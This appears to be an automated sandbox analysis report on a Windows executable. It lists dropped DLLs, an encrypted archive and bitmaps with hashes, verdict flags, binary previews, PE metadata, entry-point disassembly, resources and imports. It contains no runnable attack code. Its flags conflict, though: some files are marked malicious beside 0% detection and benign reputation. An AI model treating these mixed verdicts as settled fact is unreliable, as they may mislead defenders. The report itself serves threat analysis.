                                        SHA-512:8A600CCF97A6D5201BB791A43F16CD4CCD19A8E9DECAE79B8BA3E5200B6E8936649626112B1C6BDB1465AB8AFB395803A68286C76B817245C6077D0536D03344
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Joe Sandbox View:
                                        • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                        • Filename: pXm5oVO3Go.exe, Detection: malicious, Browse
                                        • Filename: Rudvfa0Z17.exe, Detection: malicious, Browse
                                        • Filename: nOyswc9ly2.dll, Detection: malicious, Browse
                                        • Filename: , Detection: malicious, Browse
                                        Reputation:moderate, very likely benign file
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p.. 4.os4.os4.os..nr6.os=..s".os4.ns..osf.nr7.osf.kr?.osf.lr<.osf.jr..osf.or5.osf.s5.osf.mr5.osRich4.os........................PE..L...J(.`.........."!.........~...............0.......................................r....@A.........................T......<c..........................x#.......6...W..8............................W..@............`..8............................text...b........................... ..`.data...L(...0......................@....idata.......`.......2..............@..@.rsrc................J..............@..@.reloc...6.......8...N..............@..B........................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):79792
                                        Entropy (8bit):6.778797048504205
                                        Encrypted:false
                                        SSDEEP:1536:hExZIDobDaHrrAPsCbU4qzBHXpHolecbGpJGBNzZz3:yZPDaHrrobUHzDQecbGbGN
                                        MD5:9D5A742F221C4929A178BAF2B93FC7FB
                                        SHA1:928C9E0E1C18EC474C2F450CA00A154E44AC547A
                                        SHA-256:F10727074BCB4375F276E48DA64029D370299768536157321FB4BD9B1997B898
                                        SHA-512:F4614962C67BB41B8A2FB17E3112745F4BA012BBF382C1CC7DEACD6C8525A53D75890A2EB46F0DA61BFA054DC52505B09A29291D5FA1C25C6201A66B9DC4B547
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        • Antivirus: Virustotal, Detection: 0%, Browse
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........M...M...M.....O...D...F...M...d.../..Y.../..X.../..Q.../..L.../.u.L.../..L...RichM...........PE..L...19............"!.........................................................P............@A........................P........ .......0...................'...@......x$..T............................#..@............ ...............................text...d........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):524288000
                                        Entropy (8bit):0.03653807744214944
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:A497F0BEE04EE4D4F7BEBDACB139C9DA
                                        SHA1:78A06BC3690509016D7285D3E76D2CFD4E945B56
                                        SHA-256:7326A18775A980FDE53F0E0B5C3003A58AB4C6C08B129FA453510425D88A6558
                                        SHA-512:0EA1AA71364C1DAA7A29BB400AC38A9C8ABC584D96B82860C4B62F37BA65FE138E4A8380B2890635E52BA757F9EF6E4E97504D64B7401BAA82B49BBB8FAB9240
                                        Malicious:true
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..........4.......!..........)......9.......c.........1.....0.....7....Rich...........PE..L....@.f...........!.........0......$].......................................0............@.........................pI......t6.......0..X....................@..l...................................X(..@............................................text...!........................... ..`.rdata..Z...........................@..@.data.......p.......T..............@....rsrc...X....0......................@..@.reloc..V....@......................@..B........................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                        Category:dropped
                                        Size (bytes):6443425
                                        Entropy (8bit):7.999970882342927
                                        Encrypted:true
                                        SSDEEP:98304:7c5bWQVHWXS1k+CxcfLg3LFvsI0i/2tEn+ynekhscRZ+Q3FqFoJSnerSgkogC6qz:7c5FNB7WRjsUZn5h/+e7Vkokqg8iEHCu
                                        MD5:FB936CD4F33E5AE9AB88D7AE21B8D654
                                        SHA1:157DF7F219BB272F2DC56B3AA0BD5CE70E4902DA
                                        SHA-256:3C55279D70BBAAA18DCA653DD5922BEAE2F720B8285D6A195A21961DE005BCF2
                                        SHA-512:F72254B4CE87CAAFA12DD2DDEEC7B77DABEE2FC052E3CA102E55C5ABCC7F99FD4EE6A8544F5942D2A75EDF66C406CB20A0978E9E378055B79EFFB820094AADC1
                                        Malicious:false
                                        Preview:PK........R..Y................text/UT....1.f.1.f.1.fPK..........7X........x.......text/MSVCP140.dllUT.....ej..f2M.f.z.0I\pq...7....N...y..A....L.:.v.FF.e}.F."..._.....hI.g....M_.....]..x..h.\....xh...=X....R. .....W2O#-.u..-sZ.%.ST..=.{...3W>...h./.(...nL..&.+~.^BY..<..:.T..k......jq.[...n.T..{h....../c..iAj..+..|..|.x\.:L.S...C.@r..M.u....`%..fJK].^.;$)...(.H.$...W1;c..9;fLF.....h..!=|.z..<.2..A ..<.=T.(.t-....j.K<.z>.Uu.....>a..".-,7.*\.Q.k...'#.....P....G.[H;*...}.h........}.i..x...!sVN.8....G.&_#...]J...._g]..G....,f.RJ...U/...w.d.........v.-........!.A=\\Un.....f....5c`7.[..t.:..J1.../HV.%..6I....I....B.e.j.".....>...($....|:.Wb..wAx.*......B.MX}b.p..k.05.5^%.w.C.... ua}.......*:..?u...!j[..0;!...Bi..d..i.F.2T..2.....m..gC.}.R....2.J...7.J$u)...#oo.DD...$..P.OTzy.D.F..S5.)i.*.*.....A\....]..t...P4..R..;O..._k.F..@..1......j.a.."..<...V.m....je...I*....lO.........|sl.".J..X..l8C..xqR."e.yt`.6.o8!.E...#.uA.S../..Vh...q...Q....*.4JN^...;Q..v
                                        Process:C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        File Type:PC bitmap, Windows 3.x format, 556 x 556 x 32, image size 1236544, cbSize 1236598, bits offset 54
                                        Category:dropped
                                        Size (bytes):1236598
                                        Entropy (8bit):7.382378338793816
                                        Encrypted:false
                                        SSDEEP:24576:CXptT9TEpaNPwRTOMcEBe0rOZsdEjQGOeK+GKe66/uV:CZXFNoRk10aZsWjQIBGT
                                        MD5:DAE17C69D8F4A253C008A4EC7CF45D9F
                                        SHA1:A3B99D5CAF55F9CA22E79AABF1AFA6CC9FFC80EC
                                        SHA-256:6DB78BD2576F2023F09775B0968EB9F83BB78B8575808402CD06D985BE3D0161
                                        SHA-512:AC54F2E31B25EEFCC5C690AC1A30D13489590D92AA25962B51CDC59E9B0E1490F7C994B5F1202C7922DFBAFEDAD4030137980FC05CF1515B8BE18ABED04173D1
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Preview:BMv.......6...(...,...,..... .....@...................*R..d...c...........g...'...g...g...g...g...g...g...g...g.......i...g...F..L.)Th.{ p.ggr.e c.fno.(beGzunGan #GS .gdeI...C...g......A...........4........F..........).....9...................1......0......7....5ach...g...g...7M..+....H.fg...g......!l...g...g8..g...CU..g...g...g...g...g...b...g...b...g...g8..g...g...e.@.g...g...g...g...g...w....A.......>......g8..?...g...g...g...g...gH......g...g...g...g...g...g...g...g...? ..'...g...g...g.......g...g...g...g...g...g...I|ex....F...g...g...g...g...g...g...G..`Izda.i..=...g...g...g...g...g...g...'..@Ilat........gx..g...g\..g...g...g...'...Izsr....?...g8..g...g...g...g...g...'..@Izel.k..1...gH..g...g...g...g...g...'..Bg...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g...g.
                                        Process:C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        File Type:PC bitmap, Windows 3.x format, 378 x 377 x 32, image size 570024, cbSize 570078, bits offset 54
                                        Category:dropped
                                        Size (bytes):2485
                                        Entropy (8bit):6.802741157932193
                                        Encrypted:false
                                        SSDEEP:48:8BO8xOk10hBJoLiJRw7lsjXml1yB8aUGLMvv9H3zRb2AcHbRzxaVoWUoM9QMCS:8Bek10hBGLiJRw7lsjXmlIuaUGLMv1HW
                                        MD5:932E9573B165AC805AEA8058EA0B9743
                                        SHA1:8C1BF5DB1B8D905664C72D4683245CF81014438F
                                        SHA-256:C44FC4EDA2166C8819E226452C43A3C063FDC2B11E8422C83A9C5DC05EB0AEF4
                                        SHA-512:B0752C551135303F4B5CA481C07ADC334D46953AAFAE6F432EA0BF5286E2E854D63DD9019CF144E2B773C86F875C8D19F2DD125C215AB335D38E5AC0E3DB504E
                                        Malicious:false
                                        Preview:BM.......6...(...z...y..... .........................2.....s.....0.g.S3..\$;.\$..\$..\$..@..H.V0.B..@$.7 ..T.;.....U.....ara......i.)..g...d.Iu...............g...g3.u.;.S.R<.$..g.Ph.O.i.L$0....g.t$W.D$_`.e.N.a....,8.#,Dh...*....g.t$'.D$7`..!..za...#,X.. .DC.P.#,.n.llf.L$....TC .tC(....+.n.K.g..tC .DCHh.6^f.^.......#,8.N...T..<fku1.t...}*....d.+.|f.eu{.|.cku..t...}.....d...|f.etqI..oZ.....g..........j'...g8..1..$.....x S.\$8.D$|.$.g....(P.3,<.#,|..(.._X..C...g.T$#.D$.b@V.x,S.\$8.D$|.$.g....$P.3,<.#,|..$.HG.D._X..C...g.T$#.D$..H,d@ .#,.W.:_.#@8..,..g..DC.P.#,.3U&df.L$ .d.\C*.TC .tC(...6......g..tC .DC@hi..y.b....|$0.L$T..\.1...g..tC0.DChhI.>.....|$@.L$l.$..e...g..tC@.DCphj.._......|$P.$.g..h.(.&....g.t$?..$.......1x...g...'.t$G.D$;`.=.9.~c....,(.#,hhT.0p.d..g....L$`.$.g..P....g.T$#..tnW^3.S..:.DCt8XOb..;,$t`.,.g.......g..$.....p4.>b..;,$t`...g.......gQ3..U.....1_j...3....}..}..[ .$L.....@f..j'`.0g.h.g..W.[..$P;.h.%.g..}o.u..Kd.d.Ch.E.Q0_P.4,..h...g..}o..E..p..K\..@...u..H
                                        Process:C:\Users\user\Desktop\N6xnw0iEGs.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):137736
                                        Entropy (8bit):6.877702986476462
                                        Encrypted:false
                                        SSDEEP:1536:psgfX6W9AtyRB1xKNrt7eHsYnBvNk3CIsrNSbgskHW1ICZqkVZCVXTIs:pPfqW911i8Hv5b4gzAI2jZCV3
                                        MD5:00F5198C4C4594CDBCE74ACC9C25E826
                                        SHA1:E580A39954E3D69052DA85241628C282C8A315C2
                                        SHA-256:852EFCFA8F982839391DB539C178E1D774197E7FEEC5E12A9C6A0FA341F980E0
                                        SHA-512:9B891A42EA697E7B64D4E88E9E90B427ED1E3A72FAA4F6B7C656310F1A1D2D98061C9C0A083594B0EB9BE7C2556EA878331A53D5098D824565C191DB89604E71
                                        Malicious:false
                                        Preview:.l..l4U......g.....nlh.ll.hhl..>....P.il........ml.S9:Wj.4je..$.l.._.Xj.5jn7.lZ._f..H..llf..H..llXj^...H...l4j...$.l..4.df..$.ll.X..$.ll...H4..H..ll..H...l.$.l....$.ll...H..llf..H..llf..H..llf..H..llf..H..llf..H..llf..H..ll.DHPS.8H=f.($>...DH,pf.($P ..DH>a.(HSf.($T ..DH:b. HW.(HXa. $Y..D$6.Af.($D:..LH*f.(HGt..D$%..TH&.DH'A.8HL.8HMf.($N..f.(H\V..L$2..DH3tu.($a..T$..D$.<.LH..DH.ot...DH.t..H..llF..H..ll.H...l.sh%.$.l.....$.l......H...l..$.l....ti..$.ll.o..Y..H..ll.LH..LH..LH...H...l......H...l..$.l../.ch.($l+.D$..Na...DH.iv.($u?.st..D$..I.0H|f.($}..f..H..llRt..$.ll...H..llA..H..ll..H...l..H...l*u..H..ll.H...l.ti..$.l.....$.l..8..H...l...H...l.w.ll..-.^...k.ll....$.ll.jt.$.l..4...H...l...H...l.D$p<..H...l.\$X<UU..j.3.D$(..|Hx.DHt.DHXPU.($...|$r<.tHD...bXf.($...D$z.D$0.D$t.$.l..<9.DHpP..H(....X..D$x..DHz..H...l.D$t.$.l..<9.DHpP..H(....^.($l..t$x.D$t.$.l..<9.DHpf..H.P..$(..j.4..DHxf.(H..(H<.(H...H..llPU.($.<.t$D...H..llf..H..(H...H..llPU.($...t$r<.tHD...($P..|$x.D$t.$.l..
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.948998975552655
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 98.81%
                                        • Windows ActiveX control (116523/4) 1.15%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:N6xnw0iEGs.exe
                                        File size:31'561'216 bytes
                                        MD5:8f6f306ba501a7e435db720bb97cb1e4
                                        SHA1:66de656287a3bff5a7bf89f9a0972d679e3afe3f
                                        SHA256:c9817d415d34ea3ae07094dae818ffe8e3fb1d5bcb13eb0e65fd361b7859eda7
                                        SHA512:33140e4ebd897ac76da0e2caf7b03a7938c49408fc1be5dbc6a07c15258c3cb9211dd86dde999f502b53e2f7d4947446d81c57eb18137eed92c22657bdeb4ec6
                                        SSDEEP:786432:08Mc+2YBT6yL1+5FFg3qmMB4RR2qO+Nkpzsn:5i2GT6S4pg3qmg4qQipz
                                        TLSH:FD67333174D1907BC6332631A79DB364B2FDFF710A364247739D2A2E2F709829A18667
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7F..s'x.s'x.s'x..P..x'x..P..r'x..P..{'x.s'y.N$x..P..Z'x.....Z'x......'x......&x.....z'x.....r'x.s'..r'x.....r'x.Richs'x........
                                        Icon Hash:0e0f3311b34d6faa
                                        Entrypoint:0x52bb24
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:
                                        Time Stamp:0x55AE32B9 [Tue Jul 21 11:53:29 2015 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:e6724325d4bf7b236f902a73ca987202
                                        Instruction
                                        call 00007F2ACC820D0Dh
                                        jmp 00007F2ACC8181D4h
                                        cmp ecx, dword ptr [005AD218h]
                                        jne 00007F2ACC818354h
                                        rep ret
                                        jmp 00007F2ACC81D1A6h
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        mov esi, dword ptr [ebp+14h]
                                        test esi, esi
                                        jne 00007F2ACC818356h
                                        xor eax, eax
                                        jmp 00007F2ACC8183BFh
                                        mov eax, dword ptr [ebp+08h]
                                        test eax, eax
                                        jne 00007F2ACC818365h
                                        call 00007F2ACC819899h
                                        push 00000016h
                                        pop esi
                                        mov dword ptr [eax], esi
                                        call 00007F2ACC821321h
                                        mov eax, esi
                                        jmp 00007F2ACC8183A5h
                                        push edi
                                        mov edi, dword ptr [ebp+10h]
                                        test edi, edi
                                        je 00007F2ACC818366h
                                        cmp dword ptr [ebp+0Ch], esi
                                        jc 00007F2ACC818361h
                                        push esi
                                        push edi
                                        push eax
                                        call 00007F2ACC81C6AAh
                                        add esp, 0Ch
                                        xor eax, eax
                                        jmp 00007F2ACC818388h
                                        push dword ptr [ebp+0Ch]
                                        push 00000000h
                                        push eax
                                        call 00007F2ACC81A028h
                                        add esp, 0Ch
                                        test edi, edi
                                        jne 00007F2ACC81835Bh
                                        call 00007F2ACC819858h
                                        push 00000016h
                                        jmp 00007F2ACC81835Eh
                                        cmp dword ptr [ebp+0Ch], esi
                                        jnc 00007F2ACC818365h
                                        call 00007F2ACC81984Ah
                                        push 00000022h
                                        pop esi
                                        mov dword ptr [eax], esi
                                        call 00007F2ACC8212D2h
                                        mov eax, esi
                                        jmp 00007F2ACC818355h
                                        push 00000016h
                                        pop eax
                                        pop edi
                                        pop esi
                                        pop ebp
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        xor edx, edx
                                        mov eax, edx
                                        cmp dword ptr [ebp+0Ch], eax
                                        jbe 00007F2ACC818363h
                                        mov ecx, dword ptr [ebp+08h]
                                        cmp word ptr [ecx], dx
                                        je 00007F2ACC81835Bh
                                        inc eax
                                        add ecx, 02h
                                        cmp eax, dword ptr [ebp+0Ch]
                                        jc 00007F2ACC818344h
                                        pop ebp
                                        ret
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        mov esi, dword ptr [ebp+14h]
                                        test esi, esi
                                        jne 00007F2ACC818356h
                                        xor eax, eax
                                        jmp 00007F2ACC8183C2h
                                        mov ecx, dword ptr [ebp+00h]
                                        Programming Language:
                                        • [RES] VS2012 UPD4 build 61030
                                        • [LNK] VS2012 UPD4 build 61030
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1a47cc0x1a4.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b70000x1c09379.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1dc10000x1db00.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x156d300x38.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x189ac00x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x1560000xa48.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x1548e10x154a00c5d4a51ee5f44283ad03c19dade9049bFalse0.5627616112385321data6.546158618487326IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x1560000x51faa0x52000ce429c0321fea1e23575a90421c4d7caFalse0.27663514672256095data5.015281370472236IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x1a80000xe1900x6a00a174cb13bfef882903b1fcb77a0ae5e7False0.27126326650943394data4.7756039904513825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x1b70000x1c093790x1c094000ab7673e02600a8e08e55b45054aaeaaunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1dc10000x6283a0x62a006b96737d9c8b7cbf92adf4ddf79861cbFalse0.12608671974017743data2.771861215289247IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        BIN0x1b7fa00x4bd75PE32 executable (console) Intel 80386, for MS WindowsChineseChina0.7765842038339584
                                        FLAC0x203d180x1b3d634FLAC audio bitstream data, 16 bit, stereo, 44.1 kHz, 10540358 samples0.9913301467895508
                                        GIF0x1d4134c0x6e9GIF image data, version 89a, 21 x 36ChineseChina0.7377049180327869
                                        GIF0x1d41a380xbbGIF image data, version 89a, 16 x 64ChineseChina1.0267379679144386
                                        GIF0x1d41af40x99aGIF image data, version 89a, 16 x 16ChineseChina0.7074857607811229
                                        GIF0x1d424900xa4bGIF image data, version 89a, 295 x 24ChineseChina0.8223908918406072
                                        JS0x1d42edc0x16bb3ASCII text, with very long lines (32072)ChineseChina0.3524224816608848
                                        JS0x1d59a900xd39ASCII text, with very long lines (3385), with no line terminatorsChineseChina0.3893648449039882
                                        PNG0x1d5a7cc0xa842PNG image data, 455 x 342, 8-bit/color RGB, non-interlacedChineseChina0.988926034266611
                                        PNG0x1d650100xbbbPNG image data, 85 x 96, 8-bit/color RGB, non-interlacedChineseChina0.994005994005994
                                        RT_CURSOR0x1d65bcc0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"ChineseChina0.4805194805194805
                                        RT_CURSOR0x1d65d000xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"ChineseChina0.7
                                        RT_CURSOR0x1d65db40x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.36363636363636365
                                        RT_CURSOR0x1d65ee80x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.35714285714285715
                                        RT_CURSOR0x1d6601c0x134dataChineseChina0.37337662337662336
                                        RT_CURSOR0x1d661500x134dataChineseChina0.37662337662337664
                                        RT_CURSOR0x1d662840x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                        RT_CURSOR0x1d663b80x134Targa image data 64 x 65536 x 1 +32 "\001"ChineseChina0.37662337662337664
                                        RT_CURSOR0x1d664ec0x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.36688311688311687
                                        RT_CURSOR0x1d666200x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"ChineseChina0.38636363636363635
                                        RT_CURSOR0x1d667540x134dataChineseChina0.44155844155844154
                                        RT_CURSOR0x1d668880x134dataChineseChina0.4155844155844156
                                        RT_CURSOR0x1d669bc0x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdChineseChina0.5422077922077922
                                        RT_CURSOR0x1d66af00x134dataChineseChina0.2662337662337662
                                        RT_CURSOR0x1d66c240x134dataChineseChina0.2824675324675325
                                        RT_CURSOR0x1d66d580x134dataChineseChina0.3246753246753247
                                        RT_BITMAP0x1d66e8c0xb8Device independent bitmap graphic, 12 x 10 x 4, image size 80ChineseChina0.44565217391304346
                                        RT_BITMAP0x1d66f440x144Device independent bitmap graphic, 33 x 11 x 4, image size 220ChineseChina0.37962962962962965
                                        RT_ICON0x1d670880x15900PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedChineseChina0.99921875
                                        RT_ICON0x1d7c9880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584ChineseChina0.41658286998698685
                                        RT_ICON0x1d8d1b00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016ChineseChina0.4269497582509985
                                        RT_ICON0x1d966580x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560ChineseChina0.44101503759398497
                                        RT_ICON0x1d9ce400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600ChineseChina0.4510166358595194
                                        RT_ICON0x1da22c80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896ChineseChina0.48447094945677843
                                        RT_ICON0x1da64f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600ChineseChina0.5012448132780083
                                        RT_ICON0x1da8a980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224ChineseChina0.5609756097560976
                                        RT_ICON0x1da9b400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400ChineseChina0.5745901639344262
                                        RT_ICON0x1daa4c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088ChineseChina0.7012411347517731
                                        RT_DIALOG0x1daa9300x40dataChineseChina0.8125
                                        RT_DIALOG0x1daa9700x90dataChineseChina0.6736111111111112
                                        RT_DIALOG0x1daaa000xe2dataChineseChina0.6769911504424779
                                        RT_DIALOG0x1daaae40x34dataChineseChina0.8653846153846154
                                        RT_STRING0x1daab180x4edataChineseChina0.8461538461538461
                                        RT_STRING0x1daab680x2cdataChineseChina0.5909090909090909
                                        RT_STRING0x1daab940x84dataChineseChina0.9166666666666666
                                        RT_STRING0x1daac180x1c4dataChineseChina0.8053097345132744
                                        RT_STRING0x1daaddc0x14edataChineseChina0.5179640718562875
                                        RT_STRING0x1daaf2c0x10edataChineseChina0.7037037037037037
                                        RT_STRING0x1dab03c0x50dataChineseChina0.7125
                                        RT_STRING0x1dab08c0x44dataChineseChina0.6764705882352942
                                        RT_STRING0x1dab0d00x68dataChineseChina0.7019230769230769
                                        RT_STRING0x1dab1380x1b2dataChineseChina0.6474654377880185
                                        RT_STRING0x1dab2ec0xf4dataChineseChina0.6065573770491803
                                        RT_STRING0x1dab3e00x24dataChineseChina0.4722222222222222
                                        RT_STRING0x1dab4040x1a6dataChineseChina0.6658767772511849
                                        RT_GROUP_CURSOR0x1dab5ac0x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina1.0294117647058822
                                        RT_GROUP_CURSOR0x1dab5d00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab5e40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab5f80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab60c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab6200x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab6340x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab6480x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab65c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab6700x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab6840x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab6980x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab6ac0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab6c00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_CURSOR0x1dab6d40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina1.3
                                        RT_GROUP_ICON0x1dab6e80x92Targa image data - Map 32 x 22784 x 1 +1ChineseChina0.7054794520547946
                                        RT_VERSION0x1dab77c0x2bcdataChineseChina0.5085714285714286
                                        RT_HTML0x1daba380x146f6HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (4938), with CRLF line terminatorsChineseChina0.2183221428400755
                                        RT_MANIFEST0x1dc01300x249XML 1.0 document, ASCII textEnglishUnited States0.576068376068376
                                        DLLImport
                                        KERNEL32.dllGetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetTimeZoneInformation, GetStringTypeW, GetSystemTimeAsFileTime, GetConsoleMode, ReadConsoleW, SetFilePointerEx, LCMapStringW, WriteConsoleW, SetEnvironmentVariableA, HeapQueryInformation, HeapSize, GetFileType, SetStdHandle, IsProcessorFeaturePresent, IsDebuggerPresent, VirtualQuery, VirtualAlloc, GetModuleHandleExW, ExitProcess, CreatePipe, HeapReAlloc, RtlUnwind, HeapAlloc, ExitThread, CreateThread, QueryPerformanceCounter, GetCommandLineW, FindResourceExW, VirtualProtect, Sleep, GetProfileIntW, SearchPathW, GetWindowsDirectoryW, GetTempPathW, GetTempFileNameW, SetErrorMode, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, CompareStringW, GetCurrentDirectoryW, GlobalFlags, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, DuplicateHandle, UnlockFile, SetFilePointer, SetEndOfFile, LockFile, GetVolumeInformationW, GetFullPathNameW, GetFileSize, FlushFileBuffers, DeleteFileW, GetFileTime, GetFileSizeEx, GetFileAttributesExW, FindFirstFileW, FindClose, GetThreadLocale, GetStartupInfoW, GetProcessHeap, HeapFree, GetStdHandle, GlobalGetAtomNameW, LocalReAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, InterlockedIncrement, WritePrivateProfileStringW, GetPrivateProfileStringW, GetPrivateProfileIntW, ResumeThread, SetThreadPriority, lstrcpyW, CompareStringA, lstrcmpA, GetVersionExW, GetCurrentThread, GlobalFindAtomW, GlobalAddAtomW, LoadLibraryA, lstrcmpW, GlobalDeleteAtom, GetSystemDirectoryW, DecodePointer, EncodePointer, LoadLibraryW, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetVersion, OutputDebugStringA, GetFileAttributesW, InterlockedDecrement, 